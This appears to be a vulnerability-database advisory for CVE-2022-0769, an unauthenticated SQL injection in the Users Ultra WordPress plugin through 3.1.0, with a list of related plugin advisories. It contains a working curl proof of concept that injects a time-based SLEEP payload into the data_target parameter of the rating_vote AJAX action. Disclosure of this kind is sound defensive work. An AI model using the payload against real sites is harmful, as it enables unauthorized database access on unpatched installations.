Users Ultra <= 3.1.0 – Unauthenticated SQL Injection | CVE 2022-0769 | Plugin Vulnerabilities

Description

The plugin fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(5)))gwe)--+'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

05eab45d-ebe9-440f-b9c3-73ec40ef1141

Timeline

Publicly Published

2022-03-29 (about 3 years ago)

Added

2022-03-29 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2024-10-18

Title

MyTweetLinks <= 1.1.1 - Authenticated (Subscriber+) SQL Injection

Published

2022-07-11

Title

Youzify < 1.2.0 - Unauthenticated SQLi

Published

2024-11-15

Title

WordPress Video Robot - The Ultimate Video Importer <= 1.20.0 - Unauthenticated SQL Injection

Published

2022-02-01

Title

Conversios.io < 4.6.2 - Subscriber+ SQL Injection

Published

2023-10-30

Title

Superb slideshow gallery < 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode